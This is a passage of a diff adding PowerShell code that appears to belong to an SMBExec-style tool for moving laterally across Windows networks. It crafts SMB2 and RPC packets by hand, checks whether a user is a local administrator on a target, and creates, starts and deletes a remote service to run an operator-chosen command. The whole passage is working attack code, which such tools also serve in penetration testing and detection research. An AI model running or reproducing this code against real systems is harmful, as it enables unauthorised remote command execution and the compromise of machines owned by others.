+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'Exit'
+ }
+
+ }
+
+ if($SMBExec_failed)
+ {
+ BREAK SMB_execute_loop
+ }
+
+ }
+
+ }
+ else
+ {
+
+ $SMB_client_stage = 'TreeConnect'
+
+ :SMB_execute_loop while ($SMB_client_stage -ne 'exit')
+ {
+
+ switch ($SMB_client_stage)
+ {
+
+ 'TreeConnect'
+ {
+ $SMB2_message_ID++
+ $packet_SMB2_header = New-PacketSMB2Header 0x03,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_header["CreditRequest"] = 0x7f,0x00
+
+ if($SMB_signing)
+ {
+ $packet_SMB2_header["Flags"] = 0x08,0x00,0x00,0x00
+ }
+
+ $packet_SMB2_data = New-PacketSMB2TreeConnectRequest $SMB_path_bytes
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+
+ if($SMB_signing)
+ {
+ $SMB2_sign = $SMB2_header + $SMB2_data
+ $SMB2_signature = $HMAC_SHA256.ComputeHash($SMB2_sign)
+ $SMB2_signature = $SMB2_signature[0..15]
+ $packet_SMB2_header["Signature"] = $SMB2_signature
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ }
+
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
+
+ try
+ {
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'CreateRequest'
+ }
+ catch
+ {
+ Write-Output "[-] Session connection is closed"
+ $SMB_client_stage = 'Exit'
+ }
+
+ }
+
+ 'CreateRequest'
+ {
+ #$SMB2_tree_ID = 0x01,0x00,0x00,0x00
+ $SMB2_tree_ID = $SMB_client_receive[40..43]
+ $SMB_named_pipe_bytes = 0x73,0x00,0x76,0x00,0x63,0x00,0x63,0x00,0x74,0x00,0x6c,0x00 # \svcctl
+ $SMB2_message_ID++
+ $packet_SMB2_header = New-PacketSMB2Header 0x05,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_header["CreditRequest"] = 0x7f,0x00
+
+ if($SMB_signing)
+ {
+ $packet_SMB2_header["Flags"] = 0x08,0x00,0x00,0x00
+ }
+
+ $packet_SMB2_data = New-PacketSMB2CreateRequestFile $SMB_named_pipe_bytes
+ $packet_SMB2_data["Share_Access"] = 0x07,0x00,0x00,0x00
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+
+ if($SMB_signing)
+ {
+ $SMB2_sign = $SMB2_header + $SMB2_data
+ $SMB2_signature = $HMAC_SHA256.ComputeHash($SMB2_sign)
+ $SMB2_signature = $SMB2_signature[0..15]
+ $packet_SMB2_header["Signature"] = $SMB2_signature
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ }
+
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
+
+ try
+ {
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ }
+ catch
+ {
+ Write-Output "[-] Session connection is closed"
+ $SMB_client_stage = 'Exit'
+ }
+
+ if($Refresh -and $SMB_client_stage -ne 'Exit')
+ {
+ Write-Output "[+] Session refreshed"
+ $SMB_client_stage = 'Exit'
+ }
+ elseif($SMB_client_stage -ne 'Exit')
+ {
+ $SMB_client_stage = 'RPCBind'
+ }
+
+ }
+
+ 'RPCBind'
+ {
+ $SMB_named_pipe_bytes = 0x73,0x00,0x76,0x00,0x63,0x00,0x63,0x00,0x74,0x00,0x6c,0x00 # \svcctl
+ $SMB_file_ID = $SMB_client_receive[132..147]
+ $SMB2_message_ID++
+ $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_header["CreditRequest"] = 0x7f,0x00
+
+ if($SMB_signing)
+ {
+ $packet_SMB2_header["Flags"] = 0x08,0x00,0x00,0x00
+ }
+
+ $packet_RPC_data = New-PacketRPCBind 1 0xb8,0x10 0x01 0x00,0x00 $SMB_named_pipe_UUID 0x02,0x00
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $packet_SMB2_data = New-PacketSMB2WriteRequest $SMB_file_ID $RPC_data.Length
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $RPC_data_length = $SMB2_data.Length + $RPC_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+
+ if($SMB_signing)
+ {
+ $SMB2_sign = $SMB2_header + $SMB2_data + $RPC_data
+ $SMB2_signature = $HMAC_SHA256.ComputeHash($SMB2_sign)
+ $SMB2_signature = $SMB2_signature[0..15]
+ $packet_SMB2_header["Signature"] = $SMB2_signature
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ }
+
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'ReadRequest'
+ $SMB_client_stage_next = 'OpenSCManagerW'
+ }
+
+ 'ReadRequest'
+ {
+
+ Start-Sleep -m $Sleep
+ $SMB2_message_ID++
+ $packet_SMB2_header = New-PacketSMB2Header 0x08,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_header["CreditRequest"] = 0x7f,0x00
+ $packet_SMB2_header["CreditCharge"] = 0x10,0x00
+
+ if($SMB_signing)
+ {
+ $packet_SMB2_header["Flags"] = 0x08,0x00,0x00,0x00
+ }
+
+ $packet_SMB2_data = New-PacketSMB2ReadRequest $SMB_file_ID
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+
+ if($SMB_signing)
+ {
+ $SMB2_sign = $SMB2_header + $SMB2_data
+ $SMB2_signature = $HMAC_SHA256.ComputeHash($SMB2_sign)
+ $SMB2_signature = $SMB2_signature[0..15]
+ $packet_SMB2_header["Signature"] = $SMB2_signature
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ }
+
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+
+ if([System.BitConverter]::ToString($SMB_client_receive[12..15]) -ne '03-01-00-00')
+ {
+ $SMB_client_stage = $SMB_client_stage_next
+ }
+ else
+ {
+ $SMB_client_stage = 'StatusPending'
+ }
+
+ }
+
+ 'StatusPending'
+ {
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+
+ if([System.BitConverter]::ToString($SMB_client_receive[12..15]) -ne '03-01-00-00')
+ {
+ $SMB_client_stage = $SMB_client_stage_next
+ }
+
+ }
+
+ 'OpenSCManagerW'
+ {
+ $SMB2_message_ID += 23
+ $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_header["CreditRequest"] = 0x7f,0x00
+
+ if($SMB_signing)
+ {
+ $packet_SMB2_header["Flags"] = 0x08,0x00,0x00,0x00
+ }
+
+ $packet_SCM_data = New-PacketSCMOpenSCManagerW $SMB_service_bytes $SMB_service_length
+ $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
+ $packet_RPC_data = New-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x01,0x00,0x00,0x00 0x00,0x00 0x0f,0x00
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $packet_SMB2_data = New-PacketSMB2WriteRequest $SMB_file_ID ($RPC_data.Length + $SCM_data.Length)
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $RPC_data_length = $SMB2_data.Length + $SCM_data.Length + $RPC_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+
+ if($SMB_signing)
+ {
+ $SMB2_sign = $SMB2_header + $SMB2_data + $RPC_data + $SCM_data
+ $SMB2_signature = $HMAC_SHA256.ComputeHash($SMB2_sign)
+ $SMB2_signature = $SMB2_signature[0..15]
+ $packet_SMB2_header["Signature"] = $SMB2_signature
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ }
+
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data + $SCM_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'ReadRequest'
+ $SMB_client_stage_next = 'CheckAccess'
+ }
+
+ 'CheckAccess'
+ {
+
+ if([System.BitConverter]::ToString($SMB_client_receive[128..131]) -eq '00-00-00-00' -and [System.BitConverter]::ToString($SMB_client_receive[108..127]) -ne '00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00')
+ {
+
+ $SMB_service_manager_context_handle = $SMB_client_receive[108..127]
+
+ if($SMB_execute -eq $true)
+ {
+ Write-Verbose "$output_username is a local administrator on $Target"
+ $packet_SCM_data = New-PacketSCMCreateServiceW $SMB_service_manager_context_handle $SMB_service_bytes $SMB_service_length $SMBExec_command_bytes $SMBExec_command_length_bytes
+ $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
+
+ if($SCM_data.Length -lt $SMB_split_index)
+ {
+ $SMB_client_stage = 'CreateServiceW'
+ }
+ else
+ {
+ $SMB_client_stage = 'CreateServiceW_First'
+ }
+
+ }
+ else
+ {
+ Write-Output "$output_username is a local administrator on $Target"
+ $SMB2_message_ID += 20
+ $SMB_close_service_handle_stage = 2
+ $SMB_client_stage = 'CloseServiceHandle'
+ }
+
+ }
+ elseif([System.BitConverter]::ToString($SMB_client_receive[128..131]) -eq '05-00-00-00')
+ {
+ Write-Output "$output_username is not a local administrator or does not have required privilege on $Target"
+ $SMBExec_failed = $true
+ }
+ else
+ {
+ Write-Output "Something went wrong with $Target"
+ $SMBExec_failed = $true
+ }
+
+ }
+
+ 'CreateServiceW'
+ {
+
+ if($SMBExec_command_bytes.Length -lt $SMB_split_index)
+ {
+ $SMB2_message_ID += 20
+ $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_header["CreditRequest"] = 0x7f,0x00
+
+ if($SMB_signing)
+ {
+ $packet_SMB2_header["Flags"] = 0x08,0x00,0x00,0x00
+ }
+
+ $packet_RPC_data = New-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x01,0x00,0x00,0x00 0x00,0x00 0x0c,0x00
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $packet_SMB2_data = New-PacketSMB2WriteRequest $SMB_file_ID ($RPC_data.Length + $SCM_data.Length)
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $RPC_data_length = $SMB2_data.Length + $SCM_data.Length + $RPC_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+
+ if($SMB_signing)
+ {
+ $SMB2_sign = $SMB2_header + $SMB2_data + $RPC_data + $SCM_data
+ $SMB2_signature = $HMAC_SHA256.ComputeHash($SMB2_sign)
+ $SMB2_signature = $SMB2_signature[0..15]
+ $packet_SMB2_header["Signature"] = $SMB2_signature
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ }
+
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data + $SCM_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'ReadRequest'
+ $SMB_client_stage_next = 'StartServiceW'
+ }
+ else
+ {
+
+
+ }
+ }
+
+ 'CreateServiceW_First'
+ {
+ $SMB_split_stage_final = [Math]::Ceiling($SCM_data.Length / $SMB_split_index)
+ $SMB2_message_ID += 20
+ $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_header["CreditRequest"] = 0x7f,0x00
+
+ if($SMB_signing)
+ {
+ $packet_SMB2_header["Flags"] = 0x08,0x00,0x00,0x00
+ }
+
+ $SCM_data_first = $SCM_data[0..($SMB_split_index - 1)]
+ $packet_RPC_data = New-PacketRPCRequest 0x01 0 0 0 0x01,0x00,0x00,0x00 0x00,0x00 0x0c,0x00 $SCM_data_first
+ $packet_RPC_data["AllocHint"] = [System.BitConverter]::GetBytes($SCM_data.Length)
+ $SMB_split_index_tracker = $SMB_split_index
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $packet_SMB2_data = New-PacketSMB2WriteRequest $SMB_file_ID $RPC_data.Length
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $RPC_data_length = $SMB2_data.Length + $RPC_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+
+ if($SMB_signing)
+ {
+ $SMB2_sign = $SMB2_header + $SMB2_data + $RPC_data
+ $SMB2_signature = $HMAC_SHA256.ComputeHash($SMB2_sign)
+ $SMB2_signature = $SMB2_signature[0..15]
+ $packet_SMB2_header["Signature"] = $SMB2_signature
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ }
+
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+
+ if($SMB_split_stage_final -le 2)
+ {
+ $SMB_client_stage = 'CreateServiceW_Last'
+ }
+ else
+ {
+ $SMB_split_stage = 2
+ $SMB_client_stage = 'CreateServiceW_Middle'
+ }
+
+ }
+
+ 'CreateServiceW_Middle'
+ {
+ $SMB_split_stage++
+ $SMB2_message_ID++
+ $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_header["CreditRequest"] = 0x7f,0x00
+
+ if($SMB_signing)
+ {
+ $packet_SMB2_header["Flags"] = 0x08,0x00,0x00,0x00
+ }
+
+ $SCM_data_middle = $SCM_data[$SMB_split_index_tracker..($SMB_split_index_tracker + $SMB_split_index - 1)]
+ $SMB_split_index_tracker += $SMB_split_index
+ $packet_RPC_data = New-PacketRPCRequest 0x00 0 0 0 0x01,0x00,0x00,0x00 0x00,0x00 0x0c,0x00 $SCM_data_middle
+ $packet_RPC_data["AllocHint"] = [System.BitConverter]::GetBytes($SCM_data.Length - $SMB_split_index_tracker + $SMB_split_index)
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $packet_SMB2_data = New-PacketSMB2WriteRequest $SMB_file_ID $RPC_data.Length
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $RPC_data_length = $SMB2_data.Length + $RPC_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+
+ if($SMB_signing)
+ {
+ $SMB2_sign = $SMB2_header + $SMB2_data + $RPC_data
+ $SMB2_signature = $HMAC_SHA256.ComputeHash($SMB2_sign)
+ $SMB2_signature = $SMB2_signature[0..15]
+ $packet_SMB2_header["Signature"] = $SMB2_signature
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ }
+
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+
+ if($SMB_split_stage -ge $SMB_split_stage_final)
+ {
+ $SMB_client_stage = 'CreateServiceW_Last'
+ }
+ else
+ {
+ $SMB_client_stage = 'CreateServiceW_Middle'
+ }
+
+ }
+
+ 'CreateServiceW_Last'
+ {
+ $SMB2_message_ID++
+ $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_header["CreditRequest"] = 0x7f,0x00
+
+ if($SMB_signing)
+ {
+ $packet_SMB2_header["Flags"] = 0x08,0x00,0x00,0x00
+ }
+
+ $SCM_data_last = $SCM_data[$SMB_split_index_tracker..$SCM_data.Length]
+ $packet_RPC_data = New-PacketRPCRequest 0x02 0 0 0 0x01,0x00,0x00,0x00 0x00,0x00 0x0c,0x00 $SCM_data_last
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $packet_SMB2_data = New-PacketSMB2WriteRequest $SMB_file_ID $RPC_data.Length
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $RPC_data_length = $SMB2_data.Length + $RPC_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+
+ if($SMB_signing)
+ {
+ $SMB2_sign = $SMB2_header + $SMB2_data + $RPC_data
+ $SMB2_signature = $HMAC_SHA256.ComputeHash($SMB2_sign)
+ $SMB2_signature = $SMB2_signature[0..15]
+ $packet_SMB2_header["Signature"] = $SMB2_signature
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ }
+
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'ReadRequest'
+ $SMB_client_stage_next = 'StartServiceW'
+ }
+
+ 'StartServiceW'
+ {
+
+ if([System.BitConverter]::ToString($SMB_client_receive[132..135]) -eq '00-00-00-00')
+ {
+ Write-Verbose "Service $SMB_service created on $Target"
+ $SMB_service_context_handle = $SMB_client_receive[112..131]
+ $SMB2_message_ID += 20
+ $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_header["CreditRequest"] = 0x7f,0x00
+
+ if($SMB_signing)
+ {
+ $packet_SMB2_header["Flags"] = 0x08,0x00,0x00,0x00
+ }
+
+ $packet_SCM_data = New-PacketSCMStartServiceW $SMB_service_context_handle
+ $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
+ $packet_RPC_data = New-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x01,0x00,0x00,0x00 0x00,0x00 0x13,0x00
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $packet_SMB2_data = New-PacketSMB2WriteRequest $SMB_file_ID ($RPC_data.Length + $SCM_data.Length)
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $RPC_data_length = $SMB2_data.Length + $SCM_data.Length + $RPC_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+
+ if($SMB_signing)
+ {
+ $SMB2_sign = $SMB2_header + $SMB2_data + $RPC_data + $SCM_data
+ $SMB2_signature = $HMAC_SHA256.ComputeHash($SMB2_sign)
+ $SMB2_signature = $SMB2_signature[0..15]
+ $packet_SMB2_header["Signature"] = $SMB2_signature
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ }
+
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data + $SCM_data
+ Write-Verbose "Trying to execute command on $Target"
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'ReadRequest'
+ $SMB_client_stage_next = 'DeleteServiceW'
+ }
+ elseif([System.BitConverter]::ToString($SMB_client_receive[132..135]) -eq '31-04-00-00')
+ {
+ Write-Output "Service $SMB_service creation failed on $Target"
+ $SMBExec_failed = $true
+ }
+ else
+ {
+ Write-Output "Service creation fault context mismatch"
+ $SMBExec_failed = $true
+ }
+
+ }
+
+ 'DeleteServiceW'
+ {
+
+ if([System.BitConverter]::ToString($SMB_client_receive[108..111]) -eq '1d-04-00-00')
+ {
+ Write-Output "Command executed with service $SMB_service on $Target"
+ }
+ elseif([System.BitConverter]::ToString($SMB_client_receive[108..111]) -eq '02-00-00-00')
+ {
+ Write-Output "Service $SMB_service failed to start on $Target"
+ }
+
+ $SMB2_message_ID += 20
+ $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_header["CreditRequest"] = 0x7f,0x00
+
+ if($SMB_signing)
+ {
+ $packet_SMB2_header["Flags"] = 0x08,0x00,0x00,0x00
+ }
+
+ $packet_SCM_data = New-PacketSCMDeleteServiceW $SMB_service_context_handle
+ $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
+ $packet_RPC_data = New-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x01,0x00,0x00,0x00 0x00,0x00 0x02,0x00
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $packet_SMB2_data = New-PacketSMB2WriteRequest $SMB_file_ID ($RPC_data.Length + $SCM_data.Length)
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $RPC_data_length = $SMB2_data.Length + $SCM_data.Length + $RPC_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+
+ if($SMB_signing)
+ {
+ $SMB2_sign = $SMB2_header + $SMB2_data + $RPC_data + $SCM_data
+ $SMB2_signature = $HMAC_SHA256.ComputeHash($SMB2_sign)
+ $SMB2_signature = $SMB2_signature[0..15]
+ $packet_SMB2_header["Signature"] = $SMB2_signature
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ }
+
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data + $SCM_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'ReadRequest'
+ $SMB_client_stage_next = 'CloseServiceHandle'
+ $SMB_close_service_handle_stage = 1
+ }
+
+ 'CloseServiceHandle'
+ {
+
+ if($SMB_close_service_handle_stage -eq 1)
+ {
+ Write-Verbose "Service $SMB_service deleted on $Target"
+ $SMB2_message_ID += 20
+ $SMB_close_service_handle_stage++
+ $packet_SCM_data = New-PacketSCMCloseServiceHandle $SMB_service_context_handle
+ }
+ else
+ {
+ $SMB2_message_ID++
+ $SMB_client_stage = 'CloseRequest'
+ $packet_SCM_data = New-PacketSCMCloseServiceHandle $SMB_service_manager_context_handle
+ }
+
+ $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_header["CreditRequest"] = 0x7f,0x00
+
+ if($SMB_signing)
+ {
+ $packet_SMB2_header["Flags"] = 0x08,0x00,0x00,0x00
+ }
+
+ $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
+ $packet_RPC_data = New-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x01,0x00,0x00,0x00 0x00,0x00 0x00,0x00
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $packet_SMB2_data = New-PacketSMB2WriteRequest $SMB_file_ID ($RPC_data.Length + $SCM_data.Length)
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $RPC_data_length = $SMB2_data.Length + $SCM_data.Length + $RPC_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+
+ if($SMB_signing)
+ {
+ $SMB2_sign = $SMB2_header + $SMB2_data + $RPC_data + $SCM_data
+ $SMB2_signature = $HMAC_SHA256.ComputeHash($SMB2_sign)
+ $SMB2_signature = $SMB2_signature[0..15]
+ $packet_SMB2_header["Signature"] = $SMB2_signature
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ }
+
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data + $SCM_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ }
+
+ 'CloseRequest'
+ {
+ $SMB2_message_ID += 20
+ $packet_SMB2_header = New-PacketSMB2Header 0x06,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_header["CreditRequest"] = 0x7f,0x00
+
+ if($SMB_signing)
+ {
+ $packet_SMB2_header["Flags"] = 0x08,0x00,0x00,0x00
+ }
+
+ $packet_SMB2_data = New-PacketSMB2CloseRequest $SMB_file_ID
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+
+ if($SMB_signing)
+ {
+ $SMB2_sign = $SMB2_header + $SMB2_data
+ $SMB2_signature = $HMAC_SHA256.ComputeHash($SMB2_sign)
+ $SMB2_signature = $SMB2_signature[0..15]
+ $packet_SMB2_header["Signature"] = $SMB2_signature
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ }
+
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'TreeDisconnect'
+ }
+
+ 'TreeDisconnect'
+ {
+ $SMB2_message_ID++
